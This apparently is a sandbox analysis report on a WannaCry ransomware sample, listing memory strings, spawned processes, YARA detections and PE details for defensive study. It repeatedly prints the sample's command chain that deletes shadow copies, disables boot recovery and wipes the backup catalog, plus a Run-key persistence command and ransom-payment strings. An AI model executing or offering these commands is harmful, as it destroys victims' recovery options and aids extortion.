Source: @WanaDecryptor@.exe, 0000001B.00000000.2015355782.000000000041F000.00000008.00000001.01000000.00000008.sdmp	Binary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
Source: @WanaDecryptor@.exe, 0000001B.00000000.2015355782.000000000041F000.00000008.00000001.01000000.00000008.sdmp	Binary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietvscofi13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94Englishm_%s.wnrymsg\<https://<http://%d/%d/%d %02d:%02d:%02d00;00;00;00http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how+to+buy+bitcoinhttps://en.wikipedia.org/wiki/BitcoinSend %.1f BTC to this address:%.1f BTCSend $%d worth of bitcoin to this address:$%d%02d;%02d;%02d;%02d***b.wnry+++---%s%s%d%I64d%dFailed to send your message!
Source: @WanaDecryptor@.exe, 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmp	Binary or memory string: /c vssadmin delete shadows /all /quiet &
Source: @WanaDecryptor@.exe, 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmp	Binary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet &
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet	Jump to behavior
Source: @WanaDecryptor@.exe	Binary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
Source: @WanaDecryptor@.exe, 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmp	Binary or memory string: /c vssadmin delete shadows /all /quiet &
Source: @WanaDecryptor@.exe, 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmp	Binary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet &
Source: @WanaDecryptor@.exe, 0000001E.00000000.2017719338.000000000041F000.00000008.00000001.01000000.00000008.sdmp	Binary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
Source: @WanaDecryptor@.exe, 0000001E.00000000.2017719338.000000000041F000.00000008.00000001.01000000.00000008.sdmp	Binary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietvscofi13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94Englishm_%s.wnrymsg\<https://<http://%d/%d/%d %02d:%02d:%02d00;00;00;00http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how+to+buy+bitcoinhttps://en.wikipedia.org/wiki/BitcoinSend %.1f BTC to this address:%.1f BTCSend $%d worth of bitcoin to this address:$%d%02d;%02d;%02d;%02d***b.wnry+++---%s%s%d%I64d%dFailed to send your message!
Source: @WanaDecryptor@.exe, 0000001E.00000002.2121330872.00000000005E5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: "C:\Users\user\Desktop\C:\Windows\SysWOW64\cmd.execmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietC:\Windows\S\Registry\Machine\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=computerComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\computerNUMBER_OF_PROCESSORS=16OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VB\Registry\Machine\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\GRE_InitializeFamily 6 ModJ
Source: @WanaDecryptor@.exe, 0000001E.00000002.2120270411.000000000019B000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: ^(u/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
Source: @WanaDecryptor@.exe, 0000001E.00000002.2120270411.000000000019B000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: ]Xucmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
Source: @WanaDecryptor@.exe, 00000021.00000002.5854720396.000000000041F000.00000008.00000001.01000000.00000008.sdmp	Binary or memory string: /c vssadmin delete shadows /all /quiet &
Source: @WanaDecryptor@.exe, 00000021.00000002.5854720396.000000000041F000.00000008.00000001.01000000.00000008.sdmp	Binary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet &
Source: @WanaDecryptor@.exe, 00000021.00000000.2040530880.000000000041F000.00000008.00000001.01000000.00000008.sdmp	Binary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
Source: @WanaDecryptor@.exe, 00000021.00000000.2040530880.000000000041F000.00000008.00000001.01000000.00000008.sdmp	Binary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietvscofi13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94Englishm_%s.wnrymsg\<https://<http://%d/%d/%d %02d:%02d:%02d00;00;00;00http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how+to+buy+bitcoinhttps://en.wikipedia.org/wiki/BitcoinSend %.1f BTC to this address:%.1f BTCSend $%d worth of bitcoin to this address:$%d%02d;%02d;%02d;%02d***b.wnry+++---%s%s%d%I64d%dFailed to send your message!
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy delete	Jump to behavior
Source: @WanaDecryptor@.exe, 0000002F.00000002.2348326263.000000000041F000.00000008.00000001.01000000.00000008.sdmp	Binary or memory string: /c vssadmin delete shadows /all /quiet &
Source: @WanaDecryptor@.exe, 0000002F.00000002.2348326263.000000000041F000.00000008.00000001.01000000.00000008.sdmp	Binary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet &
Source: @WanaDecryptor@.exe, 0000002F.00000000.2346390626.000000000041F000.00000008.00000001.01000000.00000008.sdmp	Binary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
Source: @WanaDecryptor@.exe, 0000002F.00000000.2346390626.000000000041F000.00000008.00000001.01000000.00000008.sdmp	Binary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietvscofi13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94Englishm_%s.wnrymsg\<https://<http://%d/%d/%d %02d:%02d:%02d00;00;00;00http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how+to+buy+bitcoinhttps://en.wikipedia.org/wiki/BitcoinSend %.1f BTC to this address:%.1f BTCSend $%d worth of bitcoin to this address:$%d%02d;%02d;%02d;%02d***b.wnry+++---%s%s%d%I64d%dFailed to send your message!
Source: @WanaDecryptor@.exe0.0.dr	Binary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
Source: @WanaDecryptor@.exe0.0.dr	Binary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietvscofi13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94Englishm_%s.wnrymsg\<https://<http://%d/%d/%d %02d:%02d:%02d00;00;00;00http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how+to+buy+bitcoinhttps://en.wikipedia.org/wiki/BitcoinSend %.1f BTC to this address:%.1f BTCSend $%d worth of bitcoin to this address:$%d%02d;%02d;%02d;%02d***b.wnry+++---%s%s%d%I64d%dFailed to send your message!

Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 27_2_004049B0 CreateFileA,GetFileSize,GlobalAlloc,ReadFile,CryptImportKey,_local_unwind2,_local_unwind2,	27_2_004049B0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 27_2_00404B70 CryptAcquireContextA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptImportKey,CryptDestroyKey,CryptEncrypt,CryptDecrypt,	27_2_00404B70
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 27_2_004046F0 CryptImportKey,	27_2_004046F0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 30_2_004049B0 CreateFileA,GetFileSize,GlobalAlloc,ReadFile,CryptImportKey,_local_unwind2,_local_unwind2,	30_2_004049B0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 30_2_00404B70 CryptAcquireContextA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptImportKey,CryptDestroyKey,CryptEncrypt,CryptDecrypt,	30_2_00404B70
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 30_2_004046F0 CryptImportKey,	30_2_004046F0

System Summary

Malicious sample detected (through community Yara rule)

Source: Wannacry.exe, type: SAMPLE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: Wannacry.exe, type: SAMPLE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: Wannacry.exe, type: SAMPLE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 47.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 33.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 33.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 30.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 47.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 27.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 27.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 30.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 0.0.Wannacry.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 0.0.Wannacry.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 0.0.Wannacry.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 00000000.00000000.813793076.000000000040E000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\Users\user\Desktop\r.wnry, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\Users\user\Desktop\u.wnry, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\@WanaDecryptor@.exe, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\@WanaDecryptor@.exe, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\@WanaDecryptor@.exe, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: C:\@WanaDecryptor@.exe, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\@WanaDecryptor@.exe, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: C:\@WanaDecryptor@.exe, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\@WanaDecryptor@.exe, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: C:\@WanaDecryptor@.exe, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs

Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 27_2_00411CF0	27_2_00411CF0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 27_2_0040B0C0	27_2_0040B0C0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 27_2_0040A150	27_2_0040A150
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 27_2_0040A9D0	27_2_0040A9D0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 27_2_00410180	27_2_00410180
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 27_2_0040B3C0	27_2_0040B3C0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 27_2_0040FBC0	27_2_0040FBC0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 27_2_00410460	27_2_00410460
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 27_2_0040ADC0	27_2_0040ADC0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 27_2_0040A610	27_2_0040A610
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 27_2_0040DF30	27_2_0040DF30
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 27_2_00406F80	27_2_00406F80
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 27_2_0040FF90	27_2_0040FF90
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 30_2_0040B0C0	30_2_0040B0C0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 30_2_0040A150	30_2_0040A150
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 30_2_0040A9D0	30_2_0040A9D0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 30_2_00410180	30_2_00410180
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 30_2_0040B3C0	30_2_0040B3C0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 30_2_0040FBC0	30_2_0040FBC0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 30_2_00410460	30_2_00410460
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 30_2_00411CF0	30_2_00411CF0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 30_2_0040ADC0	30_2_0040ADC0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 30_2_0040A610	30_2_0040A610
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 30_2_0040DF30	30_2_0040DF30
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 30_2_00406F80	30_2_00406F80
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 30_2_0040FF90	30_2_0040FF90
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Code function: 31_2_00FB25E6	31_2_00FB25E6
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Code function: 31_2_00E8A7AF	31_2_00E8A7AF
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Code function: 31_2_00FA4804	31_2_00FA4804
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Code function: 31_2_00FA298B	31_2_00FA298B
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Code function: 31_2_00FA6AC5	31_2_00FA6AC5
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Code function: 31_2_00FB6BD7	31_2_00FB6BD7
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Code function: 31_2_00FAEBC7	31_2_00FAEBC7
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Code function: 31_2_00F04CF0	31_2_00F04CF0
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Code function: 31_2_00FA6F28	31_2_00FA6F28
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Code function: 31_2_00F8F2E0	31_2_00F8F2E0

Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: edgegdi.dll
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Section loaded: edgegdi.dll

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\reg.exe reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "uqcbeegnpjpsq661" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f

Source: libevent_core-2-0-5.dll.27.dr	Static PE information: Number of sections : 17 > 10
Source: libevent-2-0-5.dll.27.dr	Static PE information: Number of sections : 17 > 10
Source: libgcc_s_sjlj-1.dll.27.dr	Static PE information: Number of sections : 17 > 10
Source: ssleay32.dll.27.dr	Static PE information: Number of sections : 18 > 10
Source: libevent_extra-2-0-5.dll.27.dr	Static PE information: Number of sections : 17 > 10
Source: libssp-0.dll.27.dr	Static PE information: Number of sections : 17 > 10
Source: libeay32.dll.27.dr	Static PE information: Number of sections : 18 > 10

Source: Wannacry.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: Wannacry.exe, type: SAMPLE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: Wannacry.exe, type: SAMPLE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: Wannacry.exe, type: SAMPLE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 47.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 33.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 33.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 30.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 47.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 27.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 27.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 30.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0.0.Wannacry.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0.0.Wannacry.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 0.0.Wannacry.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 00000000.00000000.813793076.000000000040E000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\r.wnry, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\u.wnry, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
